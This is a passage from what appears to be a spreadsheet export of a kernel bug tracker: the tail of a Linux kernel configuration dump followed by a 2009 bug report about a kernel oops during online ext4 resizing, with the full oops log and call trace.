# Note: most of these also require special kernel boot parameters # # CONFIG-BLK-DEV-4DRIVES is not set # CONFIG-BLK-DEV-ALI14XX is not set # CONFIG-BLK-DEV-DTC2278 is not set # CONFIG-BLK-DEV-HT6560B is not set # CONFIG-BLK-DEV-QD65XX is not set # CONFIG-BLK-DEV-UMC8672 is not set # CONFIG-BLK-DEV-IDEDMA is not set # # SCSI device support # # CONFIG-RAID-ATTRS is not set # CONFIG-SCSI is not set # CONFIG-SCSI-DMA is not set # CONFIG-SCSI-NETLINK is not set # CONFIG-ATA is not set # CONFIG-MD is not set # CONFIG-FUSION is not set # # IEEE 1394 (FireWire) support # # # Enable only one of the two stacks, unless you know what you are doing # # CONFIG-FIREWIRE is not set # CONFIG-IEEE1394 is not set # CONFIG-I2O is not set # CONFIG-MACINTOSH-DRIVERS is not set CONFIG-NETDEVICES=y CONFIG-COMPAT-NET-DEV-OPS=y CONFIG-IFB=y CONFIG-DUMMY=y # CONFIG-BONDING is not set # CONFIG-MACVLAN is not set # CONFIG-EQUALIZER is not set CONFIG-TUN=y # CONFIG-VETH is not set # CONFIG-NET-SB1000 is not set # CONFIG-ARCNET is not set CONFIG-PHYLIB=y # # MII PHY device drivers # CONFIG-MARVELL-PHY=y CONFIG-DAVICOM-PHY=y CONFIG-QSEMI-PHY=y CONFIG-LXT-PHY=y CONFIG-CICADA-PHY=y CONFIG-VITESSE-PHY=y CONFIG-SMSC-PHY=y CONFIG-BROADCOM-PHY=y CONFIG-ICPLUS-PHY=y # CONFIG-REALTEK-PHY is not set CONFIG-NATIONAL-PHY=y CONFIG-STE10XP=y CONFIG-LSI-ET1011C-PHY=y CONFIG-FIXED-PHY=y CONFIG-MDIO-BITBANG=y CONFIG-NET-ETHERNET=y CONFIG-MII=y # CONFIG-HAPPYMEAL is not set # CONFIG-SUNGEM is not set # CONFIG-CASSINI is not set CONFIG-NET-VENDOR-3COM=y # CONFIG-EL1 is not set # CONFIG-EL2 is not set # CONFIG-ELPLUS is not set # CONFIG-EL16 is not set # CONFIG-EL3 is not set # CONFIG-3C515 is not set CONFIG-VORTEX=y # CONFIG-TYPHOON is not set # CONFIG-LANCE is not set # CONFIG-NET-VENDOR-SMC is not set # CONFIG-ETHOC is not set # CONFIG-NET-VENDOR-RACAL is not set # CONFIG-DNET is not set CONFIG-NET-TULIP=y CONFIG-DE2104X=y CONFIG-TULIP=y # CONFIG-TULIP-MWI is not set # CONFIG-TULIP-MMIO is not set # CONFIG-TULIP-NAPI is not set CONFIG-DE4X5=y CONFIG-WINBOND-840=y CONFIG-DM9102=y CONFIG-ULI526X=y # CONFIG-AT1700 is not set # CONFIG-DEPCA is not set # CONFIG-HP100 is not set # CONFIG-NET-ISA is not set # CONFIG-IBM-NEW-EMAC-ZMII is not set # CONFIG-IBM-NEW-EMAC-RGMII is not set # CONFIG-IBM-NEW-EMAC-TAH is not set # CONFIG-IBM-NEW-EMAC-EMAC4 is not set # CONFIG-IBM-NEW-EMAC-NO-FLOW-CTRL is not set # CONFIG-IBM-NEW-EMAC-MAL-CLR-ICINTSTAT is not set # CONFIG-IBM-NEW-EMAC-MAL-COMMON-ERR is not set CONFIG-NET-PCI=y # CONFIG-PCNET32 is not set # CONFIG-AMD8111-ETH is not set # CONFIG-ADAPTEC-STARFIRE is not set # CONFIG-AC3200 is not set # CONFIG-APRICOT is not set # CONFIG-B44 is not set # CONFIG-FORCEDETH is not set # CONFIG-CS89x0 is not set CONFIG-E100=y # CONFIG-FEALNX is not set # CONFIG-NATSEMI is not set CONFIG-NE2K-PCI=y CONFIG-8139CP=y CONFIG-8139TOO=y CONFIG-8139TOO-PIO=y # CONFIG-8139TOO-TUNE-TWISTER is not set CONFIG-8139TOO-8129=y # CONFIG-8139-OLD-RX-RESET is not set # CONFIG-R6040 is not set # CONFIG-SIS900 is not set # CONFIG-EPIC100 is not set # CONFIG-SMSC9420 is not set # CONFIG-SUNDANCE is not set # CONFIG-TLAN is not set # CONFIG-VIA-RHINE is not set # CONFIG-SC92031 is not set # CONFIG-NET-POCKET is not set # CONFIG-ATL2 is not set # CONFIG-NETDEV-1000 is not set # CONFIG-NETDEV-10000 is not set # CONFIG-TR is not set # # Wireless LAN # # CONFIG-WLAN-PRE80211 is not set # CONFIG-WLAN-80211 is not set # # Enable WiMAX (Networking options) to see the WiMAX drivers # # CONFIG-WAN is not set # CONFIG-FDDI is not set # CONFIG-HIPPI is not set # CONFIG-PLIP is not set # CONFIG-PPP is not set # CONFIG-SLIP is not set # CONFIG-NETCONSOLE is not set # CONFIG-NETPOLL is not set # CONFIG-NET-POLL-CONTROLLER is not set # CONFIG-ISDN is not set # CONFIG-PHONE is not set # # Input device support # CONFIG-INPUT=y # CONFIG-INPUT-FF-MEMLESS is not set CONFIG-INPUT-POLLDEV=y # # Userland interfaces # CONFIG-INPUT-MOUSEDEV=y CONFIG-INPUT-MOUSEDEV-PSAUX=y CONFIG-INPUT-MOUSEDEV-SCREEN-X=1024 CONFIG-INPUT-MOUSEDEV-SCREEN-Y=768 # CONFIG-INPUT-JOYDEV is not set CONFIG-INPUT-EVDEV=y CONFIG-INPUT-EVBUG=y # # Input Device Drivers # CONFIG-INPUT-KEYBOARD=y CONFIG-KEYBOARD-ATKBD=y # CONFIG-KEYBOARD-SUNKBD is not set # CONFIG-KEYBOARD-LKKBD is not set CONFIG-KEYBOARD-XTKBD=y # CONFIG-KEYBOARD-NEWTON is not set # CONFIG-KEYBOARD-STOWAWAY is not set # CONFIG-INPUT-MOUSE is not set # CONFIG-INPUT-JOYSTICK is not set # CONFIG-INPUT-TABLET is not set # CONFIG-INPUT-TOUCHSCREEN is not set CONFIG-INPUT-MISC=y CONFIG-INPUT-PCSPKR=y # CONFIG-INPUT-WISTRON-BTNS is not set # CONFIG-INPUT-UINPUT is not set # # Hardware I/O ports # CONFIG-SERIO=y CONFIG-SERIO-I8042=y CONFIG-SERIO-SERPORT=y CONFIG-SERIO-CT82C710=y # CONFIG-SERIO-PARKBD is not set CONFIG-SERIO-PCIPS2=y CONFIG-SERIO-LIBPS2=y CONFIG-SERIO-RAW=y # CONFIG-GAMEPORT is not set # # Character devices # CONFIG-VT=y CONFIG-CONSOLE-TRANSLATIONS=y CONFIG-VT-CONSOLE=y CONFIG-HW-CONSOLE=y CONFIG-VT-HW-CONSOLE-BINDING=y # CONFIG-DEVKMEM is not set # CONFIG-SERIAL-NONSTANDARD is not set # CONFIG-NOZOMI is not set # # Serial drivers # CONFIG-SERIAL-8250=y CONFIG-SERIAL-8250-CONSOLE=y CONFIG-FIX-EARLYCON-MEM=y CONFIG-SERIAL-8250-PCI=y CONFIG-SERIAL-8250-PNP=y CONFIG-SERIAL-8250-NR-UARTS=48 CONFIG-SERIAL-8250-RUNTIME-UARTS=4 CONFIG-SERIAL-8250-EXTENDED=y # CONFIG-SERIAL-8250-MANY-PORTS is not set CONFIG-SERIAL-8250-SHARE-IRQ=y # CONFIG-SERIAL-8250-DETECT-IRQ is not set # CONFIG-SERIAL-8250-RSA is not set # # Non-8250 serial port support # CONFIG-SERIAL-CORE=y CONFIG-SERIAL-CORE-CONSOLE=y CONFIG-CONSOLE-POLL=y # CONFIG-SERIAL-JSM is not set CONFIG-UNIX98-PTYS=y CONFIG-DEVPTS-MULTIPLE-INSTANCES=y CONFIG-LEGACY-PTYS=y CONFIG-LEGACY-PTY-COUNT=0 CONFIG-PRINTER=y # CONFIG-LP-CONSOLE is not set CONFIG-PPDEV=y # CONFIG-IPMI-HANDLER is not set CONFIG-HW-RANDOM=y # CONFIG-HW-RANDOM-TIMERIOMEM is not set # CONFIG-HW-RANDOM-INTEL is not set # CONFIG-HW-RANDOM-AMD is not set # CONFIG-HW-RANDOM-GEODE is not set # CONFIG-HW-RANDOM-VIA is not set CONFIG-NVRAM=y # CONFIG-DTLK is not set # CONFIG-R3964 is not set # CONFIG-APPLICOM is not set # CONFIG-SONYPI is not set # CONFIG-MWAVE is not set # CONFIG-PC8736x-GPIO is not set # CONFIG-NSC-GPIO is not set # CONFIG-CS5535-GPIO is not set # CONFIG-RAW-DRIVER is not set CONFIG-HANGCHECK-TIMER=y # CONFIG-TCG-TPM is not set # CONFIG-TELCLOCK is not set CONFIG-DEVPORT=y CONFIG-I2C=y CONFIG-I2C-BOARDINFO=y # CONFIG-I2C-CHARDEV is not set # CONFIG-I2C-HELPER-AUTO is not set # # I2C Algorithms # CONFIG-I2C-ALGOBIT=y CONFIG-I2C-ALGOPCF=y CONFIG-I2C-ALGOPCA=y # # I2C Hardware Bus support # # # PC SMBus host controller drivers # # CONFIG-I2C-ALI1535 is not set # CONFIG-I2C-ALI1563 is not set # CONFIG-I2C-ALI15X3 is not set # CONFIG-I2C-AMD756 is not set # CONFIG-I2C-AMD8111 is not set # CONFIG-I2C-I801 is not set # CONFIG-I2C-ISCH is not set # CONFIG-I2C-PIIX4 is not set # CONFIG-I2C-NFORCE2 is not set # CONFIG-I2C-SIS5595 is not set # CONFIG-I2C-SIS630 is not set # CONFIG-I2C-SIS96X is not set # CONFIG-I2C-VIA is not set # CONFIG-I2C-VIAPRO is not set # # I2C system bus drivers (mostly embedded / system-on-chip) # # CONFIG-I2C-OCORES is not set # CONFIG-I2C-SIMTEC is not set # # External I2C/SMBus adapter drivers # # CONFIG-I2C-PARPORT is not set # CONFIG-I2C-PARPORT-LIGHT is not set # CONFIG-I2C-TAOS-EVM is not set # # Graphics adapter I2C/DDC channel drivers # # CONFIG-I2C-VOODOO3 is not set # # Other I2C/SMBus bus drivers # # CONFIG-I2C-ELEKTOR is not set # CONFIG-I2C-PCA-ISA is not set # CONFIG-I2C-PCA-PLATFORM is not set # CONFIG-SCx200-ACB is not set # # Miscellaneous I2C Chip support # # CONFIG-DS1682 is not set # CONFIG-SENSORS-PCF8574 is not set # CONFIG-PCF8575 is not set # CONFIG-SENSORS-PCA9539 is not set # CONFIG-SENSORS-MAX6875 is not set # CONFIG-SENSORS-TSL2550 is not set # CONFIG-I2C-DEBUG-CORE is not set # CONFIG-I2C-DEBUG-ALGO is not set # CONFIG-I2C-DEBUG-BUS is not set # CONFIG-I2C-DEBUG-CHIP is not set # CONFIG-SPI is not set CONFIG-ARCH-WANT-OPTIONAL-GPIOLIB=y # CONFIG-GPIOLIB is not set CONFIG-W1=y # CONFIG-W1-CON is not set # # 1-wire Bus Masters # # CONFIG-W1-MASTER-MATROX is not set # CONFIG-W1-MASTER-DS2482 is not set # # 1-wire Slaves # # CONFIG-W1-SLAVE-THERM is not set # CONFIG-W1-SLAVE-SMEM is not set # CONFIG-W1-SLAVE-DS2431 is not set # CONFIG-W1-SLAVE-DS2433 is not set CONFIG-W1-SLAVE-DS2760=y # CONFIG-W1-SLAVE-BQ27000 is not set # CONFIG-POWER-SUPPLY is not set # CONFIG-HWMON is not set # CONFIG-THERMAL is not set CONFIG-THERMAL-HWMON=y # CONFIG-WATCHDOG is not set CONFIG-SSB-POSSIBLE=y # # Sonics Silicon Backplane # # CONFIG-SSB is not set # # Multifunction device drivers # # CONFIG-MFD-CORE is not set # CONFIG-MFD-SM501 is not set # CONFIG-HTC-PASIC3 is not set # CONFIG-TWL4030-CORE is not set # CONFIG-MFD-TMIO is not set # CONFIG-PMIC-DA903X is not set # CONFIG-MFD-WM8400 is not set # CONFIG-MFD-WM8350-I2C is not set # CONFIG-MFD-PCF50633 is not set # CONFIG-REGULATOR is not set # # Multimedia devices # # # Multimedia core support # # CONFIG-VIDEO-DEV is not set # CONFIG-DVB-CORE is not set # CONFIG-VIDEO-MEDIA is not set # # Multimedia drivers # # CONFIG-DAB is not set # # Graphics support # # CONFIG-AGP is not set # CONFIG-DRM is not set # CONFIG-VGASTATE is not set # CONFIG-VIDEO-OUTPUT-CONTROL is not set # CONFIG-FB is not set CONFIG-BACKLIGHT-LCD-SUPPORT=y # CONFIG-LCD-CLASS-DEVICE is not set CONFIG-BACKLIGHT-CLASS-DEVICE=y # CONFIG-BACKLIGHT-GENERIC is not set # CONFIG-BACKLIGHT-PROGEAR is not set # CONFIG-BACKLIGHT-MBP-NVIDIA is not set # CONFIG-BACKLIGHT-SAHARA is not set # # Display device support # # CONFIG-DISPLAY-SUPPORT is not set # # Console display driver support # CONFIG-VGA-CONSOLE=y # CONFIG-VGACON-SOFT-SCROLLBACK is not set # CONFIG-MDA-CONSOLE is not set CONFIG-DUMMY-CONSOLE=y # CONFIG-SOUND is not set CONFIG-HID-SUPPORT=y CONFIG-HID=y CONFIG-HID-DEBUG=y # CONFIG-HIDRAW is not set CONFIG-HID-PID=y # # Special HID drivers # # CONFIG-USB-SUPPORT is not set # CONFIG-UWB is not set # CONFIG-MMC is not set # CONFIG-MEMSTICK is not set # CONFIG-NEW-LEDS is not set # CONFIG-ACCESSIBILITY is not set # CONFIG-INFINIBAND is not set # CONFIG-EDAC is not set CONFIG-RTC-LIB=y CONFIG-RTC-CLASS=y CONFIG-RTC-HCTOSYS=y CONFIG-RTC-HCTOSYS-DEVICE="rtc0" # CONFIG-RTC-DEBUG is not set # # RTC interfaces # CONFIG-RTC-INTF-SYSFS=y CONFIG-RTC-INTF-PROC=y CONFIG-RTC-INTF-DEV=y CONFIG-RTC-INTF-DEV-UIE-EMUL=y CONFIG-RTC-DRV-TEST=y # # I2C RTC drivers # CONFIG-RTC-DRV-DS1307=y CONFIG-RTC-DRV-DS1374=y CONFIG-RTC-DRV-DS1672=y CONFIG-RTC-DRV-MAX6900=y CONFIG-RTC-DRV-RS5C372=y CONFIG-RTC-DRV-ISL1208=y CONFIG-RTC-DRV-X1205=y CONFIG-RTC-DRV-PCF8563=y CONFIG-RTC-DRV-PCF8583=y CONFIG-RTC-DRV-M41T80=y CONFIG-RTC-DRV-M41T80-WDT=y # CONFIG-RTC-DRV-S35390A is not set CONFIG-RTC-DRV-FM3130=y CONFIG-RTC-DRV-RX8581=y # # SPI RTC drivers # # # Platform RTC drivers # CONFIG-RTC-DRV-CMOS=y CONFIG-RTC-DRV-DS1286=y # CONFIG-RTC-DRV-DS1511 is not set CONFIG-RTC-DRV-DS1553=y CONFIG-RTC-DRV-DS1742=y CONFIG-RTC-DRV-STK17TA8=y CONFIG-RTC-DRV-M48T86=y CONFIG-RTC-DRV-M48T35=y CONFIG-RTC-DRV-M48T59=y CONFIG-RTC-DRV-BQ4802=y CONFIG-RTC-DRV-V3020=y # # on-CPU RTC drivers # # CONFIG-DMADEVICES is not set # CONFIG-AUXDISPLAY is not set # CONFIG-UIO is not set # CONFIG-STAGING is not set CONFIG-X86-PLATFORM-DEVICES=y # # Firmware Drivers # # CONFIG-EDD is not set CONFIG-FIRMWARE-MEMMAP=y # CONFIG-DELL-RBU is not set # CONFIG-DCDBAS is not set # CONFIG-DMIID is not set # CONFIG-ISCSI-IBFT-FIND is not set # # File systems # CONFIG-EXT2-FS=y CONFIG-EXT2-FS-XATTR=y CONFIG-EXT2-FS-POSIX-ACL=y CONFIG-EXT2-FS-SECURITY=y # CONFIG-EXT2-FS-XIP is not set CONFIG-EXT3-FS=y # CONFIG-EXT3-DEFAULTS-TO-ORDERED is not set CONFIG-EXT3-FS-XATTR=y CONFIG-EXT3-FS-POSIX-ACL=y CONFIG-EXT3-FS-SECURITY=y # CONFIG-EXT4-FS is not set CONFIG-JBD=y # CONFIG-JBD-DEBUG is not set CONFIG-FS-MBCACHE=y # CONFIG-REISERFS-FS is not set # CONFIG-JFS-FS is not set CONFIG-FS-POSIX-ACL=y CONFIG-FILE-LOCKING=y # CONFIG-XFS-FS is not set # CONFIG-OCFS2-FS is not set # CONFIG-BTRFS-FS is not set CONFIG-DNOTIFY=y CONFIG-INOTIFY=y CONFIG-INOTIFY-USER=y # CONFIG-QUOTA is not set # CONFIG-AUTOFS-FS is not set # CONFIG-AUTOFS4-FS is not set # CONFIG-FUSE-FS is not set CONFIG-GENERIC-ACL=y # # Caches # CONFIG-FSCACHE=y # CONFIG-FSCACHE-STATS is not set # CONFIG-FSCACHE-HISTOGRAM is not set # CONFIG-FSCACHE-DEBUG is not set CONFIG-CACHEFILES=y # CONFIG-CACHEFILES-DEBUG is not set # CONFIG-CACHEFILES-HISTOGRAM is not set # # CD-ROM/DVD Filesystems # CONFIG-ISO9660-FS=y CONFIG-JOLIET=y CONFIG-ZISOFS=y CONFIG-UDF-FS=y CONFIG-UDF-NLS=y # # DOS/FAT/NT Filesystems # CONFIG-FAT-FS=y CONFIG-MSDOS-FS=y CONFIG-VFAT-FS=y CONFIG-FAT-DEFAULT-CODEPAGE=437 CONFIG-FAT-DEFAULT-IOCHARSET="iso8859-1" CONFIG-NTFS-FS=y # CONFIG-NTFS-DEBUG is </t>
  </si>
  <si>
    <t>Kernel oops while online resizing of an ext4 filesystem</t>
  </si>
  <si>
    <t>2.6.29-2-amd64</t>
  </si>
  <si>
    <t>2009-06-16 09:13 UTC</t>
  </si>
  <si>
    <t>Alessandro Polverini</t>
  </si>
  <si>
    <t>2012-06-08 12:01 UTC</t>
  </si>
  <si>
    <t>I extended the device with lvm, then I tried to resize2f the filesystem and I got these errors: Jun 16 09:49:00 nb1a kernel: [677830.909054] PGD 5bf79067 PUD 59768067 PMD 0 Jun 16 09:49:00 nb1a kernel: [677830.909144] CPU 1 Jun 16 09:49:00 nb1a kernel: [677830.909163] Modules linked in: ext4 jbd2 crc16 tun ip6table_filter ip6_tables iptable_raw xt_comment xt_recent xt_po licy ipt_ULOG ipt_TTL ipt_ttl ipt_REJECT ipt_REDIRECT ipt_NETMAP ipt_MASQUERADE ipt_LOG ipt_ECN ipt_ecn ipt_CLUSTERIP ipt_ah ipt_addrtype nf_nat_tftp nf_nat_snmp_basic nf_nat_sip nf_nat_pptp nf_nat_proto_gre nf_nat_irc nf_nat_h323 nf_nat_ftp nf_nat_amanda ts_kmp nf_conntrack_amanda nf_conntrack_tf tp nf_conntrack_sip nf_conntrack_proto_sctp nf_conntrack_pptp nf_conntrack_proto_gre nf_conntrack_netlink nf_conntrack_netbios_ns nf_conntrack_irc nf _conntrack_h323 nf_conntrack_ftp xt_tcpmss xt_pkttype xt_physdev xt_owner xt_NFQUEUE xt_NFLOG nfnetlink_log xt_multiport xt_MARK xt_mark xt_mac xt_li mit xt_length xt_iprange xt_helper xt_hashlimit xt_DSCP xt_dscp xt_dccp xt_conntrack xt_CONNMARK xt_connmark xt_CLASSIFY xt_tcpudp xt_state iptable_n at nf_nat nf_conntrack_ipv4 nf_defrag_ipv4 nf_conntrack iptable_mangle iptable_filter ip_tables x_tables nfnetlink drbd cn autofs4 Jun 16 09:49:00 nb1a kernel: nfsd nfs lockd nfs_acl auth_rpcgss sunrpc ipv6 quota_v2 quota_tree xfs exportfs loop firewire_sbp2 firewire_core crc_itu _t evdev snd_pcm snd_timer snd soundcore pcspkr snd_page_alloc psmouse serio_raw k8temp shpchp pci_hotplug i2c_nforce2 i2c_core button ext3 jbd mbcac he dm_mirror dm_region_hash dm_log dm_snapshot dm_mod ide_cd_mod cdrom ide_pci_generic sd_mod crc_t10dif amd74xx ide_core sata_nv floppy 3w_9xxx r816 9 mii ata_generic forcedeth libata scsi_mod ehci_hcd ohci_hcd thermal processor fan thermal_sys Jun 16 09:49:00 nb1a kernel: [677830.909795] Pid: 4620, comm: resize2fs Not tainted 2.6.29-2-amd64 #1 H8DM8-2 Jun 16 09:49:00 nb1a kernel: [677830.909822] RIP: 0010:[&lt;ffffffffa069a97e&gt;] [&lt;ffffffffa069a97e&gt;] ext4_group_add+0x135c/0x143e [ext4] Jun 16 09:49:00 nb1a kernel: [677830.909875] RSP: 0000:ffff8800b6f29c48 EFLAGS: 00010202 Jun 16 09:49:00 nb1a kernel: [677830.909900] RAX: 000000000000b8c8 RBX: ffff880157a38000 RCX: 000000000000b8c8 Jun 16 09:49:00 nb1a kernel: [677830.909940] RDX: 0000000000007dfe RSI: ffff8800b6f29e48 RDI: ffff880157a380e8 Jun 16 09:49:00 nb1a kernel: [677830.909981] RBP: 0000000000000000 R08: 0000000000000000 R09: 0000000000000000 Jun 16 09:49:00 nb1a kernel: [677830.910022] R10: 0000000000001719 R11: 0000000000000002 R12: 0000000000000000 Jun 16 09:49:00 nb1a kernel: [677830.910062] R13: ffff8802118e1800 R14: ffff8800263e93f0 R15: 0000000000000200 Jun 16 09:49:00 nb1a kernel: [677830.910103] FS: 00007f2decdc6700(0000) GS:ffff88021ea99e40(0000) knlGS:0000000000000000 Jun 16 09:49:00 nb1a kernel: [677830.910146] CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b Jun 16 09:49:00 nb1a kernel: [677830.910171] CR2: 000000000000b8cc CR3: 0000000083b24000 CR4: 00000000000006e0 Jun 16 09:49:00 nb1a kernel: [677830.910212] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 Jun 16 09:49:00 nb1a kernel: [677830.910253] DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400 Jun 16 09:49:00 nb1a kernel: [677830.910294] Process resize2fs (pid: 4620, threadinfo ffff8800b6f28000, task ffff8801fe4e8000) Jun 16 09:49:00 nb1a kernel: [677830.910355] ffffffff80479d3c 0000000000000202 000000000000d2c7 ffffffff802846db Jun 16 09:49:00 nb1a kernel: [677830.911053] RSP &lt;ffff8800b6f29c48&gt; Jun 16 09:49:00 nb1a kernel: [677830.911364] ---[ end trace 46ff5ad2da854d81 ]--- Jun 16 09:49:00 nb1a kernel: [677830.911423] ------------[ cut here ]------------ Jun 16 09:49:00 nb1a kernel: [677830.911479] WARNING: at /build/buildd/linux-2.6-2.6.29/debian/build/source_amd64_none/kernel/exit.c:983 do_exit+0x41/0x7b1() Jun 16 09:49:00 nb1a kernel: [677830.911560] Hardware name: H8DM8-2 Jun 16 09:49:00 nb1a kernel: [677830.911614] Modules linked in: ext4 jbd2 crc16 tun ip6table_filter ip6_tables iptable_raw xt_comment xt_recent xt_policy ipt_ULOG ipt_TTL ipt_ttl ipt_REJECT ipt_REDIRECT ipt_NETMAP ipt_MASQUERADE ipt_LOG ipt_ECN ipt_ecn ipt_CLUSTERIP ipt_ah ipt_addrtype nf_nat_tftp nf_nat_snmp_basic nf_nat_sip nf_nat_pptp nf_nat_proto_gre nf_nat_irc nf_nat_h323 nf_nat_ftp nf_nat_amanda ts_kmp nf_conntrack_amanda nf_conntrack_tftp nf_conntrack_sip nf_conntrack_proto_sctp nf_conntrack_pptp nf_conntrack_proto_gre nf_conntrack_netlink nf_conntrack_netbios_ns nf_conntrack_irc nf_conntrack_h323 nf_conntrack_ftp xt_tcpmss xt_pkttype xt_physdev xt_owner xt_NFQUEUE xt_NFLOG nfnetlink_log xt_multiport xt_MARK xt_mark xt_mac xt_limit xt_length xt_iprange xt_helper xt_hashlimit xt_DSCP xt_dscp xt_dccp xt_conntrack xt_CONNMARK xt_connmark xt_CLASSIFY xt_tcpudp xt_state iptable_nat nf_nat nf_conntrack_ipv4 nf_defrag_ipv4 nf_conntrack iptable_mangle iptable_filter ip_tables x_tables nfnetlink drbd cn autofs4 Jun 16 09:49:00 nb1a kernel: nfsd nfs lockd nfs_acl auth_rpcgss sunrpc ipv6 quota_v2 quota_tree xfs exportfs loop firewire_sbp2 firewire_core crc_itu_t evdev snd_pcm snd_timer snd soundcore pcspkr snd_page_alloc psmouse serio_raw k8temp shpchp pci_hotplug i2c_nforce2 i2c_core button ext3 jbd mbcache dm_mirror dm_region_hash dm_log dm_snapshot dm_mod ide_cd_mod cdrom ide_pci_generic sd_mod crc_t10dif amd74xx ide_core sata_nv floppy 3w_9xxx r8169 mii ata_generic forcedeth libata scsi_mod ehci_hcd ohci_hcd thermal processor fan thermal_sys Jun 16 09:49:00 nb1a kernel: [677830.921994] Pid: 4620, comm: resize2fs Tainted: G D 2.6.29-2-amd64 #1 Jun 16 09:49:00 nb1a kernel: [677830.922067] Call Trace: Jun 16 09:49:00 nb1a kernel: [677830.922121] [&lt;ffffffff80243a29&gt;] warn_slowpath+0xd8/0x112 Jun 16 09:49:00 nb1a kernel: [677830.922181] [&lt;ffffffff80227dbc&gt;] default_spin_lock_flags+0x5/0x9 Jun 16 09:49:00 nb1a kernel: [677830.922240] [&lt;ffffffff80479d3c&gt;] _spin_lock_irqsave+0x24/0x2c Jun 16 09:49:00 nb1a kernel: [677830.922299] [&lt;ffffffff80479d3c&gt;] _spin_lock_irqsave+0x24/0x2c Jun 16 09:49:00 nb1a kernel: [677830.922358] [&lt;ffffffff8024412a&gt;] release_console_sem+0x197/0x1cc Jun 16 09:49:00 nb1a kernel: [677830.922419] [&lt;ffffffff80477eac&gt;] printk+0x4e/0x5a Jun 16 09:49:00 nb1a kernel: [677830.922476] [&lt;ffffffff80227dbc&gt;] default_spin_lock_flags+0x5/0x9 Jun 16 09:49:00 nb1a kernel: [677830.922536] [&lt;ffffffff80246bb4&gt;] do_exit+0x41/0x7b1 Jun 16 09:49:00 nb1a kernel: [677830.922594] [&lt;ffffffff802592cc&gt;] up+0xe/0x36 Jun 16 09:49:00 nb1a kernel: [677830.922650] [&lt;ffffffff80479d3c&gt;] _spin_lock_irqsave+0x24/0x2c Jun 16 09:49:00 nb1a kernel: [677830.922709] [&lt;ffffffff8024412a&gt;] release_console_sem+0x197/0x1cc Jun 16 09:49:00 nb1a kernel: [677830.922769] [&lt;ffffffff80214d99&gt;] oops_end+0xb6/0xbb Jun 16 09:49:00 nb1a kernel: [677830.922827] [&lt;ffffffff8022e86a&gt;] do_page_fault+0x8c4/0x966 Jun 16 09:49:00 nb1a kernel: [677830.922887] [&lt;ffffffff80292096&gt;] __rmqueue_smallest+0xa6/0x126 Jun 16 09:49:00 nb1a kernel: [677830.922947] [&lt;ffffffff80292133&gt;] __rmqueue+0x1d/0x1fd Jun 16 09:49:00 nb1a kernel: [677830.923005] [&lt;ffffffff80211b8e&gt;] common_interrupt+0xe/0x13 Jun 16 09:49:00 nb1a kernel: [677830.923066] [&lt;ffffffff80344070&gt;] cfq_set_request+0x0/0x30e Jun 16 09:49:00 nb1a kernel: [677830.923124] [&lt;ffffffff8029238f&gt;] rmqueue_bulk+0x7c/0x8c Jun 16 09:49:00 nb1a kernel: [677830.923184] [&lt;ffffffff8029e2a1&gt;] zone_statistics+0x3c/0x5f Jun 16 09:49:00 nb1a kernel: [677830.923243] [&lt;ffffffff80292096&gt;] __rmqueue_smallest+0xa6/0x126 Jun 16 09:49:00 nb1a kernel: [677830.923303] [&lt;ffffffff8029e2a1&gt;] zone_statistics+0x3c/0x5f Jun 16 09:49:00 nb1a kernel: [677830.923362] [&lt;ffffffff802943cc&gt;] __alloc_pages_internal+0xd2/0x422 Jun 16 09:49:00 nb1a kernel: [677830.923421] [&lt;ffffffff80479de2&gt;] _spin_lock+0x5/0x7 Jun 16 09:49:00 nb1a kernel: [677830.923483] [&lt;ffffffffa06761cd&gt;] __jbd2_journal_temp_unlink_buffer+0x35/0xf5 [jbd2] Jun 16 09:49:00 nb1a kernel: [677830.923562] [&lt;ffffffffa067633b&gt;] __jbd2_journal_file_buffer+0xae/0x144 [jbd2] Jun 16 09:49:00 nb1a kernel: [677830.923640] [&lt;ffffffffa06773a5&gt;] do_get_write_access+0x3cf/0x414 [jbd2] Jun 16 09:49:00 nb1a kernel: [677830.923700] [&lt;ffffffff80479de2&gt;] _spin_lock+0x5/0x7 Jun 16 09:49:00 nb1a kernel: [677830.923758] [&lt;ffffffff8047a0c5&gt;] page_fault+0x25/0x30 Jun 16 09:49:00 nb1a kernel: [677830.923824] [&lt;ffffffffa069a97e&gt;] ext4_group_add+0x135c/0x143e [ext4] Jun 16 09:49:00 nb1a kernel: [677830.923891] [&lt;ffffffffa069a946&gt;] ext4_group_add+0x1324/0x143e [ext4] Jun 16 09:49:00 nb1a kernel: [677830.923951] [&lt;ffffffff80479d3c&gt;] _spin_lock_irqsave+0x24/0x2c Jun 16 09:49:00 nb1a kernel: [677830.924011] [&lt;ffffffff802846db&gt;] delayacct_end+0x7d/0x88 Jun 16 09:49:00 nb1a kernel: [677830.924070] [&lt;ffffffff802db3d0&gt;] sync_dirty_buffer+0x5f/0x98 Jun 16 09:49:00 nb1a kernel: [677830.924128] [&lt;ffffffff80479de2&gt;] _spin_lock+0x5/0x7 Jun 16 09:49:00 nb1a kernel: [677830.924189] [&lt;ffffffffa067b5bb&gt;] jbd2_journal_update_superblock+0x133/0x13f [jbd2] Jun 16 09:49:00 nb1a kernel: [677830.924279] [&lt;ffffffff80479de2&gt;] _spin_lock+0x5/0x7 Jun 16 09:49:00 nb1a kernel: [677830.924344] [&lt;ffffffffa06905df&gt;] ext4_ioctl+0x4dd/0x5d8 [ext4] Jun 16 09:49:00 nb1a kernel: [677830.924403] [&lt;ffffffff8023f8a3&gt;] finish_task_switch+0x2a/0xc7 Jun 16 09:49:00 nb1a kernel: [677830.924463] [&lt;ffffffff802c869e&gt;] vfs_ioctl+0x21/0x6c Jun 16 09:49:00 nb1a kernel: [677830.924521] [&lt;ffffffff802c8b22&gt;] do_vfs_ioctl+0x439/0x472 Jun 16 09:49:00 nb1a kernel: [677830.924580] [&lt;ffffffff802bdaaf&gt;] vfs_write+0xcd/0x102 Jun 16 09:49:00 nb1a kernel: [677830.924638] [&lt;ffffffff802c8bac&gt;] sys_ioctl+0x51/0x70 Jun 16 09:49:00 nb1a kernel: [677830.924696] [&lt;ffffffff802110aa&gt;] system_call_fastpath+0x16/0x1b Jun 16 09:49:00 nb1a kernel: [677830.924756] ---[ end trace 46ff5ad2da854d82 ]--- Jun 16 09:49:00 nb1a kernel: [677830.924189] [&lt;ffffffffa067b5bb&gt;] jbd2_journal_update_superblock+0x133/0x13f [jbd2] Jun 16 09:49:00 nb1a kernel: [677830.924279] [&lt;ffffffff80479de2&gt;] _spin_lock+0x5/0x7 Jun 16 09:49:00 